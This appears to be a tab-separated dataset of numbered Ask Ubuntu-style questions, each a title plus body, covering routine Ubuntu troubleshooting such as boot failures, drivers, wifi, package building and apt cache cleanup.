481935	ppa with latest php 5.3.x branch for 12.04	is there a php 5.3.x ppa for 12.04 ?
481936	is it possible to stream music from multible devices ( android/ios ) to a computer , that then makes a queue ?	i want to be able to stream music from multible devices , primarily mobilephones , that is on the same wi-fi network , to a computer which then makes a queue and then streams from the specific phone , when the requested song is no . 1 . is there any solutions for this yet ? and if so what ? ( it does n't necessarily has to be on the ubuntu os , btw ) looking forward to hear your wise answers ; - )
481937	when will ubuntu fully support high resolution displays	i 've tried tinkering with font sizes in the unity-tweak-tool and changing the scale in the display but have been unable to find a workable solution . will there be proper support for this in the future ? if so when can i expect it ? i 'd love to start using ubuntu again .
481938	problems with update	i have a problem with updates . during update , i receive the following message . failed to download repository information check your internet connection . w : failed to fetch ppa.launchpad.net/ gwendal-lebihan-dev/ cinnamon-stable/ ubuntu/ dists/ precise/ main/ source/ sources 404 not found and also a couples of broken patheses , that are not allowed to post , according to link policy i this site i am a newby in this , so please help . yeah . ubuntu 12.04
481942	is it safe to remove `` proposed '' from sources.list ?	i just realized that one of my production machines has : deb http : //us.archive.ubuntu.com/ubuntu/ precise-proposed main restricted universe multiverse enabled inside its apt-get sources.list . luckily this is just a cloud based load balancer.. is it safe to remove this line from sources.list ? if a `` beta '' ( or `` proposed '' update ) is overwritten by a stable release in the future , does anybody see potential issues that could arise in such a scenario ? if all i face is a potential `` downgrade '' to a stable release , this is not a problem . thanks !
481946	network settings disappears	i need to apply systemwide proxy . when i went to system settings and then network , the networks settings screen flashes very quickly and then disappears . other settings pages are working fine . i am using ubuntu 12.04 .
481947	maas : unable to start `` commisioned '' nodes	i am having problems while trying to start my first node using kvm ( qemu 2.0.0 ) and maas . automatic detection worked fine , and during the commission ( virtual machine window ) i get errors such as : booting under maas directions ... nomodeset iscsi_target_name= ( ... ) maas loading amd64/generic/trusty/release/boot-kernel ... .. boot failed : press a key to retry , or wait for reset ... ... ... and modprobe : error : could not insert 'impi_si ' : no such device success success success ( ... ) and after that , the virtual machine ( node ) turns off automatically , and the maas gui shows the node as `` ready '' ( in green ) but when trying to start it , i get this error message : the action `` start selected nodes '' could not be performed on 1 node because its state does not allow that action . when opening the section with the properties of the node , i get this other error message : you can boot this node using an adequately configured dhcp server . see https : //maas.ubuntu.com/docs/nodes.html for instructions . the dhcp server is running on the maas server , because the node does get its ip when booting , and it is set up on the web gui as well ... any idea of why is my node not starting ?
481949	i ca n't log into my ubuntu 12.04	when i try to log in on my ubuntu 12.04 it goes to a black screen ( of logging in checking stuff ) , and says checking battery -- -- - [ ok ] ( i 'm using a computer instead of a laptop ) and just goes back to the login screen . two days before i executed the command sudo startx trying to start kde , but it did n't work . and after logging off and trying to log in again , i had this problem . a big problem is that i do n't have internet connection at home . what should i do ?
481951	bluetooth headset connects but not showing in sound settings	i was able to listen with my bt headset , but suddenly , one day , it disappeared from sound settings forever ! i 've even re-paired my headset ( and its connected already ) but it does n't have any options in sound settings in order to listen from it . when i try this command : hcitool scan it does n't find any devices ! even this command : pactl list cards short only lists my default sound card only ! what should i do ?
481953	14.04 low graphics mode	how to update amd graphics driver ( the command ) ? my laptop has amd a-10 processor . infact all versions of ubuntu are showing like this in mine .
481956	sd card write speed not as advertised , on 14.04 at least	i bought a new sd card and the claimed performance is a long way from my benchmark . is there something i can do improve the transfer speed when working with this sd card ? information on the disk : $ df -- output=source , fstype , size , target -h filesystem type size mounted on /dev/mmcblk0p1 fuseblk 60g /media/drew/6564-6433 partition type : hpfs/ntfs contents : exfat ( version 1.0 ) the card 's packaging claims : speed up to 30 mb/s* ( 200x ) following the asterisk leads to : up to 30mb/s transfer speed ; write speed lower . based on internal testing ; performance may be lower depending on host device . 1mp = 1,000,000 bytes . x = 150kb/s . my machine did n't recognise the card 's formatting at first , so i installed exfat-fuse the package and it worked at the next attempt . i then ran a benchmark using gnome-disks : as you can see , the average read speed of 7.1 mb/s which is a long way from 30 mb/s . that 's 4.2 times slower ( 23 % ) . is there anything i can do to improve the transfer speed when working with this sd card ? edit output of hdparam as requested in comments : $ sudo hdparm -tt /dev/mmcblk0 /dev/mmcblk0 : timing cached reads : 12186 mb in 1.99 seconds = 6111.71 mb/sec timing buffered disk reads : 34 mb in 3.17 seconds = 10.73 mb/sec i executed this four times on an unoccupied machine and the results were consistent across runs . the first number ( 6gb/s ) is described as : the speed of reading directly from the linux buffer cache without disk access . this measurement is essentially an indication of the throughput of the processor , cache , and memory of the system under test . the second number ( 10 mb/s ) is described as : this displays the speed of reading through the buffer cache to the disk without any prior caching of data . this measurement is an indication of how fast the drive can sustain sequential data reads under linux , without any filesystem overhead . so 10 mb/s may be the throughput for a different type of load , or possibly just for a shorter time ( the incomplete chart above ran for around 5 minutes before i took that screenshot . ) either way , it 's still not close to 30 mb/s !
481963	i am unable to login after an update	10th of june i 've made an update and now i 'm no more able to login . unfortunately i do n't know wat was included in this update . my pc looks like logging in , but , after a few seconds , it comes back to the login screen and ask me again and again the password ( or to select another account ) .
481965	how can i work out what v4l2 driver/module my webcam is using ?	i 've got a fault with how my webcam is being handled ( awful framerate ) . i 'd like to diagnose this and possibly dig into the code but i ca n't tell which v4l2 driver the thing 's actually using . how do i get v4l2 ( or other ) to tell me ?
481967	can i do a fresh install ontop of outdated ubuntu ?	i have an outdated version of ubuntu . can i back up my files , download the latest version to a disk & do a complete fresh install of the latest version ? or do i need to uninstall the outdated version first ? sorry i am a beginner in linux & trying to learn : )
481971	after install , how to get ubuntu to boot from hdd ?	how do i get my pc to know that ubuntu is on a certain hdd to boot it ? currently its installed on a hdd with 2 partitions- does that matter ? tried going into system bios and picking the hdd with no luck .
481975	repeated init message in /var/log/messages : `` handling drivers-device-added / -removed '' event	my gpu card has started causing troubles so i looked into /var/log/messages and found this pair of lines repeating over 3000 times within a few hours : jun 11 21:43:40 myhost kernel : [ 16942.564565 ] init : handling drivers-device-added event jun 11 21:43:41 myhost kernel : [ 16942.641190 ] init : handling drivers-device-removed event i have two opteron cpus running on the supermicro h8dg6/h8dgi main board with 32g ram . this machine does n't have graphical output , but there are two gpu cards ( nvidia tesla k20c ) attached over pcie . what can be the cause for the excessive logging ? recently , the gpus have started to produce lots of memory errors and i 'm not sure if there 's a hardware defect or some misconfiguration ( perhaps some pcie settings in bios ? ) . i described the memory errors on stackoverflow , if you 're interested .
481980	how to set wallpaper for both monitors on xubuntu when using arandr	i used arandr ( a gui for xrandr ) to set up two monitors side by side in my xfce/xubuntu de . however , the wallpaper that set using the xfce settings manager applies only to one monitor , while the other uses the default wallpaper . does anyone know how to set a wallpaper that will apply to both monitors ?
481982	add android-x86-4.4-rc2 to ubuntu grub	i installed android-x86-4.4-rc2 with windows xp and windows 7 , after i installed ubuntu 14.04 . now android-x86-4.4-rc2 is not showing up in grub . what should i do to fix this ? thank you ! edited : i used the command sudo update grub , but appears only ubuntu and windows in grub .
481984	external monitor ca n't display max resolution	i had been using an external monitor , an old dell inc. 19 '' with ubuntu 14.04 for a while now , the resolution it displayed at was something like 1366x768 or 1366x1024 , i ca n't remember exactly which one it was . however , one day when i restarted my computer , i can no longer get that resolution on the external display , and can now display a max resolution of 1024x768 . does anyone know why this might happen all of a sudden ? i think it was after running a system update .
481986	retired xp machines - which version to install ?	i retired several p4 3.4ghz pcs with 2gb ram at the office . the hardware is still working but 4-5 years old . which version of ubuntu can i use to make these pcs useful . never used ubuntu before .
481987	i updated ubuntu to 14.04 and nautilus disappeared	i 'm sorry im all new to this . i do n't know how to activate nautilus.. the sidebar with my desktop icons disappeared also . i ca n't do anything . please help..
481990	asus x201e wo n't boot to any usb	i am trying to install xubuntu / ubuntu on my asus x201e laptop , but i do n't even get to the install menu , because the live usb ( which i 've tried making in lili , unetbootin ) does n't do anything . i do n't have any other os installed and the usb is listed asi boot option # 1 . afaik , the laptop only support efi .
481992	translating to bash command	so for a project for school i had to install the dpj extension to the java language . i downloaded and unpacked a tarball containing the files , and then was told to run the following : setenv dpj_root $ { home } /dpjbin setenv path $ { path } : $ { dpj_root } /implementation/bin how do i do these commands using bash ? i know i have to open up the /etc/profile file and add 2 lines ( or for the path one do i just append something to the top line of the file after a colon ? ) . any help in how to do this would be appreciated . if it helps i run ubuntu 14.04 on virtualbox ( and have little to no experience )
481997	laptop battery always discharging	i have fully updated ubuntu 14.04 on my asus x550dp laptop . my problem is that the battery always discharging . when i plug the ac adapter in , it charges battery up to around 96 % and stops charging there , but the power management tool says that my battery is in use and discharging . what is the problem ? edit ( my ac plugged in ) ac profile battery profile
482000	trying to build/install patched gtk3-engines-oxygen to test bugfix , get shared changelog.debian.gz is different from other instances of package	i want to just quickly test the patch in this bug report to gtk3-engines-oxygen so it can go upstream . i could test it either temporarily or permanently ; i would just like to do it . i currently have the package installed . so far , i 've tried : $ mkdir /tmp/o # keep everything self-contained $ cd /tmp/o $ apt-get source gtk3-engines-oxygen $ cd oxygen-gtk3-1.3.5/ $ patch -p1 < /path/to/patchfile $ dpkg-source -- commit # to make debuild happy ( name 'layout ' ; just save the default ; this is a test ) $ debuild -us -uc # bypass signature checks $ sudo debi ../oxygen-gtk3_1.3.5-0ubuntu1_amd64.changes according to some people on # ubuntu-packaging , this is what i have to do . it 's this last step that 's the problem ; i 'm getting ( reading database ... 503333 files and directories currently installed . ) preparing to unpack gtk3-engines-oxygen_1.3.5-0ubuntu1_amd64.deb ... unpacking gtk3-engines-oxygen : amd64 ( 1.3.5-0ubuntu1 ) over ( 1.3.5-0ubuntu1 ) ... dpkg : error processing archive gtk3-engines-oxygen_1.3.5-0ubuntu1_amd64.deb ( -- install ) : trying to overwrite shared '/usr/share/doc/gtk3-engines-oxygen/changelog.debian.gz ' , which is different from other instances of package gtk3-engines-oxygen : amd64 errors were encountered while processing : gtk3-engines-oxygen_1.3.5-0ubuntu1_amd64.deb debi : debpkg -i failed what 's going on ? how do i fix it ? or am i doing this completely wrong ( and ergo so are they ) ? i 'm using kubuntu 14.04 amd64 . thanks .
482002	which ubuntu ( git ) linux kernel tree matches my installed kernel ?	answering a recent question , and before that , trying to see if a patch which is fundamental for my machine had been included in a kernel release , i have found the following problem : how can i match the kernel version i have for my kernel , which is [ : ~ ] % uname -a linux samsung-romano 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux with the exact kernel source , which i suppose should be stored in http : //kernel.ubuntu.com/git ? p=ubuntu/linux.git ; a=summary ? in that page there are quite a lot of tags , for example : but none of them correspond to 3.13.0-29 which is my running kernel right now . the mapping should be in https : //wiki.ubuntu.com/kernel/dev/extendedstable , where it is said that the 3.13 ubuntu kernel is based on 3.13.11 -- - i think . but from there to finding the tree i have installed is not straightforward . the best options seems to go to linux3.13-y.review or linux3.13-y.queue , but i am unable to find where this tree are marked for the release - if i understand well the policy , in -review the patches are accumulated for testing , and in -queue accumulated for the next minor release/update -- - but i am unable to find the exact release tree . i mean , a tag equivalent to 3.13.0-29 was cut here . is that the tip of linux3.13-y ? in this moment it is claiming it is 3.13.11.2 : where can i find a reference that links that number to the result of my uname -a ( which is 3.13.0-29 ) ? notice : i know i can install the kernel source corresponding with my installed kernel . but i do not want to install them ; i would like ti have a pointer to the git tree to be able to browse it online ( and check for commits , patches , etc . ) .
482003	weird ubuntu desktop boot partition on external hard drive	i have a thinkpad with windows 7 . last time i installed an ubuntu/windows dual boot , windows was never same after and regularly got corrupted so this time , i installed ubuntu on a separate external hard drive . i took a 500 gb external hard drive and used windows to shrink the partition on it to 400 gb , freeing 100 gb to install ubuntu . then i modified the booting priority of my computer to boot from the external hard drive if present . then , i installed ubuntu desktop on the external hard drive using a dvd , picked the most simplistic partitioning scheme i could get away with ( did n't go auto as it did n't include the external hard drive as a choice ) and voilă . fast forward some time and i 'm trying to refresh my understanding of linux partitions to install a bunch of servers , so i 'm looking at the current partitioning scheme on my external hard drive and find the boot partition puzzling ... sda is my integrated hard drive with windows 7. sdb is my ubuntu desktop external hard drive . running parted on sdb , i get this : ( parted ) print model : wd my passport 0740 ( scsi ) disk /dev/sdb : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 393gb 393gb primary ntfs boot 2 393gb 500gb 107gb extended 5 393gb 425gb 32.8gb logical linux-swap ( v1 ) 6 425gb 500gb 74.6gb logical ext4 at this point , i 'm wondering why the ntfs partition is flagged as `` boot '' and not my ext4 partition which is the partition that contains / ( and by extension , /boot since it 's not on its own separate partition ) . looking at mtab only confirms what i already know : eric @ eric-thinkpad-w530 : ~ $ sudo cat /etc/mtab /dev/sdb6 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/cgroup tmpfs rw 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 none /sys/fs/pstore pstore rw 0 0 systemd /sys/fs/cgroup/systemd cgroup rw , noexec , nosuid , nodev , none , name=systemd 0 0 gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=eric 0 0 /dev/sdb1 /media/eric/my\040passport fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 my lack of understanding concerning this is not vital to anything ( this is only my development desktop partition ) , but somehow annoys me . any insight that could shed some light on this would be welcome .
482004	useradd instead of adduser,	so i installed ubuntu 13.04 , set up sftp , that 's all good . setting up vsftpd for regular ftp users ( we need those too , sadly . sftp is n't for good for all our purposes ) , i accidently used useradd to create one of the users instead of adduser . this user ca n't log in to frig all . i tried to delete the user and re-add it with adduser , no dice . it creates the user , but the permissions are frigged up . any idea how i can completely undo a useradd , so that i can adduser this person and have everything coming up milhouse again ? sorry boys , i frigged up hard .
482006	ubuntu 14.04 is unstable on my thinkpad t61	i have this super old thinkpad t61 and installed ubuntu 14.04 on it . i noticed x11 is quite unstable . it 'd freeze all the time , especially after suspension . sometimes dash would appear as a blue screen , etc , etc . i have tried xunbuntu as well . it 's pretty much the same . but i do n't seem to have problem with debian 7.5 . i still prefer ubuntu to debian . i just wonder which build of ubuntu would have similar video/x versions as debian 7.5 . thanks .
482009	14.04 lts will not connet to wireless networks	after installing ubuntu 14.04 lts , my elitebook 8540w will not connect to wireless networks . it detects them and asks me for my password , but does not connect and asks for the password again after several minutes . this same machine will connect fine with 12.04 and windows 7 .
482012	on networks n150 wifi adapter on lubuntu 12.04	i 'm trying to get my wifi adapter running . the exact model of the adapter is here : https : //wikidevi.com/wiki/on_networks_ % 28netgear % 29_n150ma . i do n't know whether or not it works on newer versions of ubuntu , but my laptop can only run 12.04 because of the pesky sis 671 graphics chipset . the adapter is recognized by the computer as 0846:9042 netgear , inc. , and that 's pretty much it . it runs on windows just fine . i 've tried installing the rtl8192cu drivers from the realtek site , did n't work . also tried installing the windows drivers on the installation cd via ndiswrapper , it showed `` invalid driver '' . any help would be appreciated .
482013	ubuntu wont boot , black screen on start up	i have an asus g73jh laptop that i am attempting to reinstall ubuntu on . i previously had windows 7 and ubuntu 12.04 loaded on it . i attempted to update ubuntu 12.04 earlier today which came up with an error during the update . i decided to try and reinstall ubuntu on the partion that already had it with 14.04 from a usb . upon doing so , i accidentally erased windows 7 by picking the option that said replace ubuntu 12.04 ( i figured it would leave my other partition alone , i was wrong ) . so i lost my windows 7 partition and then ubuntu would not load . i got a blank black screen upon boot . i figured something happened to the grub so i decided to try a complete reinstall and erase the whole disk . however , i am still getting a blank black screen upon boot . any help would be greatly appreciated . thanks .
482014	my fujifilm finepix hs50exp used to work fine on ubuntu 13	my fujifilm finepix hs50exp used to work fine on ubuntu 13 ( after installing the fujiplay app ) but now it wont recognise the camera after i upgraded to 14.10 . please advise how i can rectify this .
482015	toshiba usb drive doesnt mount on 14.04 - metal clicking noises - fine on windows	i have a toshiba 2t hard drive that makes clicking noises rather than mounts . also have a nikon colorplex that does n't mount . 14.04 is up to date . here is the dmesg tail for the hard drive . [ 2980.500891 ] usb 3-3.5.3 : new high-speed usb device number 10 using xhci_hcd [ 2980.546292 ] usb 3-3.5.3 : new usb device found , idvendor=0480 , idproduct=0200 [ 2980.546300 ] usb 3-3.5.3 : new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 2980.546305 ] usb 3-3.5.3 : product : external usb 3.0 [ 2980.546309 ] usb 3-3.5.3 : manufacturer : toshiba [ 2980.546313 ] usb 3-3.5.3 : serialnumber : 20140105001491f [ 2980.546540 ] usb 3-3.5.3 : ep 0x81 - rounding interval to 16 microframes , ep desc says 20 microframes [ 2980.546549 ] usb 3-3.5.3 : ep 0x2 - rounding interval to 16 microframes , ep desc says 20 microframes [ 2980.547098 ] usb-storage 3-3.5.3:1.0 : usb mass storage device detected [ 2980.547270 ] scsi7 : usb-storage 3-3.5.3:1.0 [ 2981.546323 ] scsi 7:0:0:0 : direct-access toshiba external usb 3.0 0 pq : 0 ansi : 6 [ 2981.546623 ] sd 7:0:0:0 : attached scsi generic sg3 type 0
482016	apache 2.4.7 wo n't work , even after root directory changing	i recently installed ubuntu 14.04 and apache 2 on my computer . when i try to run test.php ( i already changed the root directory to /var/www and placed test.php there ) it only prints phpinfo ( ) . then i get a blank screen . when i run the same script from the command line it works well , but when i try to run via a browser it wo n't work . i also tried to run the script using port 80 , but it did n't change anything .
482018	how to add a command to init script	i want to run the command : sudo apt-get update when my system starts . i am running a ubuntu variant called zorin os . i have recently updated the kernel to 3.15.0-999 . 64-bit . i would like to run command after the network has initialized and the computer has been connected to the internet .
482019	laptop keeps wiping hard drive every reboot on full linux pc	i am trying to install ubuntu on my $ 3,500 laptop . i have a samsung np905s3g-k01au laptop with grub and the samsung bootloader screen ... i inserted my usb and booted my computer , it iscoming up with a screen saying : all boot options tried , press any key to retry sequence or f4 to boot from iso image . i obviously pressed f4 , upon restarting my pc it showed a screen with four options : try without installing install ubuntu something about installing for factory owners check disk for defects . i chose install ubuntu and then installed it . i chose to erase disk because i had backed up all my work . after ubuntu installed , i finished a bunch of business-work in libreoffice and saved it to disk . then i shut down my pc . the next day when i restarted my computer , i came to see the try ubuntu screen and the other options can someone please tell me how to ensure ubuntu stays on my computer ?
482020	hvr1250 card fails to open with mythtv	i have tirelessly been trying to setup mythtv but this card will not open . after checking out this link i entered lspci -vvnn and got this : 05:00.0 multimedia video controller [ 0400 ] : conexant systems , inc. cx23887/8 pcie broadcast audio and video decoder with 3d comb [ 14f1:8880 ] ( rev 04 ) subsystem : hauppauge computer works inc. device [ 0070:2a18 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 19 region 0 : memory at fe800000 ( 64-bit , non-prefetchable ) [ size=2m ] capabilities : < access denied > kernel driver in use : cx23885 notice how mine says access denied under `` capabilities '' ? i have no idea how to correct this . also i have noticed that most people use /dev/dvb/adapter0/video0 or /dev/video0 for their source when setting up mythtv but i do n't see any file under dev that makes sense . is this where the driver is stored ? i posted this question on ubuntuforums and mythtv forums but have not gotten an answer . please help .
482022	are there any power over ethernet software packages ?	is there a way to set up/regulate power over ethernet ( poe ) from a computer running ubuntu ( either server or even desktop ) , for a network and if so how ?
482023	can not boot into new install of ubuntu 14 server	seems like a fair few people have had similar problems , but i 've tried all the suggestions in other threads to no avail . i have installed ubuntu 14.04 on a hp proliant ml310e server via burning iso of the ubuntu server and following the process . i have 2 hdds which i want to set up as raid 1 , and during the ubunutu server install , it gave me the option to set this up as it installed , so i did . install processed fine , with no reported errors . upon rebooting , the system does not even attempt to boot from hdd , and just from cdrom and nic , both of which obviously fail . i then booted into live cd and ran boot repair which gave me a heap of commands to run in terminal and eventually game me this report : http : //paste.ubuntu.com/7630512/ then in the disk utility it shows my two physical drives each partitioned as `` master boot record '' `` linux raid auto ( bootable ) and linux raid member ( dev/sda1 and dev/sdb1 ) one drive ( sda ) has partition 1 ( main , linux raid member ) , plus extended partition 2 , plus swap partition 5 plus free space 1.1mb second drive ( sdb ) has just partition 1 ( main linux raid member ) plus free space 1.1mb disk utility also shows the raid array , /dev/md/0 , contents ext4 mounted at /mnt/boot-sav/md0 here are some screenshots : and still , upon restart , it just wo n't boot - just goes straight to cdrom and nic . the bios boot order has hard drive c : ( see boot controller order ) as # 1 and boot controller order just has one option , which is pci embedeed hp dynamic smart array b120i controller . wonder if this is anything to do with it , as i 'm not using the hp 's own raid software ( tried that , also did n't work ) . any advice , most appreciated . have been trying / reinstalling / trying for days now ! thanks edit : if i use the boot override to force it to boot from hdd , it does n't even look like it tries and goes straight to attempting to book from cd-rom
482024	ubuntu 12.04 nvidia graphic card geforce 8400m gs error -- striped lines on my screen	i am running ubuntu 12.04 on my laptop and my graphic card is nvidia geforce 8400m gs . i was watching a video , when my laptop all of a sudden rebooted . it could n't finish the reboot properly and got stuck with a black screen and the commands that check different parts of the system . my monitor does not show letters properly ( e.g. , continue reads c t ue ) . i tried using the grub loader to revert back to a previous kernel . now , i have the gui but the resolution is awful and there are so many strip purple vertical lines on my monitor . i also tried purging nvidia driver and reinstalling the driver . it did not change anything . it is worth noting that even the dell window at the very beginning of the boot does n't have a perfect picture and there are so many missing pixels . i 'm using an external monitor , tried disconnecting that and it did n't help . my laptop screen is also weird . any help with regard to this will be highly appreciated . thank you .
482025	removing packages	i need to remove the debian files of these packages from /var/cache/apt/archives/ : attr cabextract fonts-horai-umefont fonts-unfonts-core fonts-wqy-microhei gcc-4.8-base gcc-4.9-base libasn1-8-heimdal libasound2 libasound2-plugins libasyncns0 libavahi-client3 libavahi-common-data libavahi-common3 libc6 libcapi20-3 libcapi20-3 libcgmanager0 libcomerr2 libcups2 libdb5.3 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libelf1 libexif12 libexpat1 libffi6 libflac8 libfontconfig1 libfreetype6 libgcc1 libgcrypt11 libgd3 libgif4 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglib2.0-0 libglu1-mesa libgnutls26 libgpg-error0 libgphoto2-6 libgphoto2-port10 libgpm2 libgssapi-krb5-2 libgssapi3-heimdal libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libhcrypto4-heimdal libhdb9-heimdal libheimbase1-heimdal libheimntlm0-heimdal libhx509-5-heimdal libice6 libieee1284-3 libjack-jackd2-0 libjbig0 libjpeg-turbo8 libjpeg8 libjson-c2 libk5crypto3 libkdc2-heimdal libkeyutils1 libkrb5-26-heimdal libkrb5-3 libkrb5support0 liblcms2-2 libldap-2.4-2 libllvm3.4 libltdl7 liblzma5 libmpg123-0 libmpg123-0 libncurses5 libnih-dbus1 libnih1 libodbc1 libogg0 libopenal1 liborc-0.4-0 libosmesa6 libosmesa6 libp11-kit-gnome-keyring libp11-kit0 libpciaccess0 libpcre3 libpng12-0 libpulse0 libroken18-heimdal libsamplerate0 libsane libsasl2-2 libsasl2-modules libsasl2-modules-db libselinux1 libsm6 libsndfile1 libspeexdsp1 libsqlite3-0 libssl1.0.0 libstdc++6 libtasn1-6 libtiff5 libtinfo5 libtxc-dxtn-s2tc0 libudev1 libusb-1.0-0 libuuid1 libv4l-0 libv4lconvert0 libvorbis0a libvorbisenc2 libvpx1 libwind0-heimdal libwrap0 libx11-6 libx11-xcb1 libxau6 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-sync1 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxi6 libxinerama1 libxml2 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxslt1.1 libxt6 libxxf86vm1 ocl-icd-libopencl1 ocl-icd-libopencl1 p11-kit-modules p7zip python-dnspython samba samba-dsdb-modules samba-vfs-modules tdb-tools ttf-mscorefonts-installer ttf-wqy-microhei unixodbc winbind wine-gecko2.21 wine-gecko2.21 wine-mono0.0.8 wine1.6 wine1.6-amd64 wine1.6-i386 winetricks zlib1g glibc-doc locales isdnutils-doc isdnutils-doc rng-tools libgd-tools libglide3 gnutls-bin gphoto2 gtkam gpm krb5-doc krb5-user libvisual-0.4-plugins gstreamer-codec-install gnome-codec-install gstreamer0.10-tools gstreamer0.10-plugins-base jackd2 liblcms2-utils libmyodbc odbc-postgresql tdsodbc unixodbc-bin libportaudio2 libroar-compat2 pulseaudio hplip hpoj libsane-extras libsasl2-modules-otp libsasl2-modules-ldap libsasl2-modules-sql libsasl2-modules-gssapi-mit libsasl2-modules-gssapi-heimdal opencl-icd opencl-icd bind9 bind9utils ldb-tools ntp smbldap-tools libnss-winbind libpam-winbind dosbox xml-core unixodbc wine-mono0.0.8 attr cabextract fonts-horai-umefont fonts-unfonts-core fonts-wqy-microhei gcc-4.8-base gcc-4.9-base libasn1-8-heimdal libasound2 libasound2-plugins libasyncns0 libavahi-client3 libavahi-common-data libavahi-common3 libc6 libcapi20-3 libcapi20-3 libcgmanager0 libcomerr2 libcups2 libdb5.3 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libelf1 libexif12 libexpat1 libffi6 libflac8 libfontconfig1 libfreetype6 libgcc1 libgcrypt11 libgd3 libgif4 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglib2.0-0 libglu1-mesa libgnutls26 libgpg-error0 libgphoto2-6 libgphoto2-port10 libgpm2 libgssapi-krb5-2 libgssapi3-heimdal libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libhcrypto4-heimdal libhdb9-heimdal libheimbase1-heimdal libheimntlm0-heimdal libhx509-5-heimdal libice6 libieee1284-3 libjack-jackd2-0 libjbig0 libjpeg-turbo8 libjpeg8 libjson-c2 libk5crypto3 libkdc2-heimdal libkeyutils1 libkrb5-26-heimdal libkrb5-3 libkrb5support0 liblcms2-2 libldap-2.4-2 libllvm3.4 libltdl7 liblzma5 libmpg123-0 libmpg123-0 libncurses5 libnih-dbus1 libnih1 libodbc1 libogg0 libopenal1 liborc-0.4-0 libosmesa6 libosmesa6 libp11-kit-gnome-keyring libp11-kit0 libpciaccess0 libpcre3 libpng12-0 libpulse0 libroken18-heimdal libsamplerate0 libsane libsasl2-2 libsasl2-modules libsasl2-modules-db libselinux1 libsm6 libsndfile1 libspeexdsp1 libsqlite3-0 libssl1.0.0 libstdc++6 libtasn1-6 libtiff5 libtinfo5 libtxc-dxtn-s2tc0 libudev1 libusb-1.0-0 libuuid1 libv4l-0 libv4lconvert0 libvorbis0a libvorbisenc2 libvpx1 libwind0-heimdal libwrap0 libx11-6 libx11-xcb1 libxau6 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-sync1 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxi6 libxinerama1 libxml2 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxslt1.1 libxt6 libxxf86vm1 ocl-icd-libopencl1 ocl-icd-libopencl1 p11-kit-modules p7zip python-dnspython samba samba-dsdb-modules samba-vfs-modules tdb-tools ttf-mscorefonts-installer ttf-wqy-microhei unixodbc winbind wine wine-gecko2.21 wine-gecko2.21 wine-mono0.0.8 wine1.6 wine1.6-amd64 wine1.6-i386 winetricks zlib1g how can i do this using a command ?
482026	imported openssh keys are saved in gnome2 keyring , not openssh	i have run into a frustrating issue , that i am sure will be a snap to solve . when importing an openssh key via the `` passwords & keys '' ( seahorse ) program , it simply places it within the `` gnome2 key storage '' folder , which seems to cause it to not work when attempting to connect to a server . i discussed this issue with a friend who has working keys and compared the header and footer and they appear nearly identical . if anyone could let me know what my issue could be , i would appreciate it . thank you .
482027	gnome-terminal : ca n't access url from the terminal by single click	i want to access the url that is printed on the command line . for example , if i see the man pages for dropbox , there are some url links with underlines ( i.e . https : //www.dropbox.com/ ) -- the only way to access this url is to do right click and copy the link . is there anyway i can access it using a single click ?
482029	how can i reinstall or restore library files via command line ?	in an effort to get civ 5 running on my machine , i deleted libgcc_s.so.1 and the soft link libstdc++.so.6 which referred to libstdc++.so.6.0.19 . this was a terrible idea and now i can not run many programs such as nautilus or apt-get . after restarting , i have no gui , but i can access the console view . to delete the files , i was running nautilus as superuser , and i used ctrl-f to find the files and back them up to my desktop and move the originals to the trash . i thought that in the worst case scenario , i could copy the files back to the /lib/i386-linux-gnu/ directory . this worked for libgcc_s.so.1 . however , when i try to copy the loft link libstdc++.so.6 i get the following error message . cp : can not stat â/libstdc++.so.6â : no such file or directory . potentially relevant is that the file is displayed in red in the console view . i understand that means it is an archive file , but i do n't know what an archive file is and why i ca n't copy archive files . any solutions ( reinstalling or replacing the files , etc . ) which restore functionality will be greatly appreciated .
482031	installed pipelight successfully , browser still says it 's uninstalled	for example , this page : http : //bubblemark.com/silverlight2.html still says i need to install silverlight . i 've re-installed pipelight twice , and enabled it using pipelight-plugin -- enable silverlight , still does n't work . any help ? i 'm using the latest version of ( stable ) chrome . edit : this seems to be a problem with chrome , firefox runs it just fine .
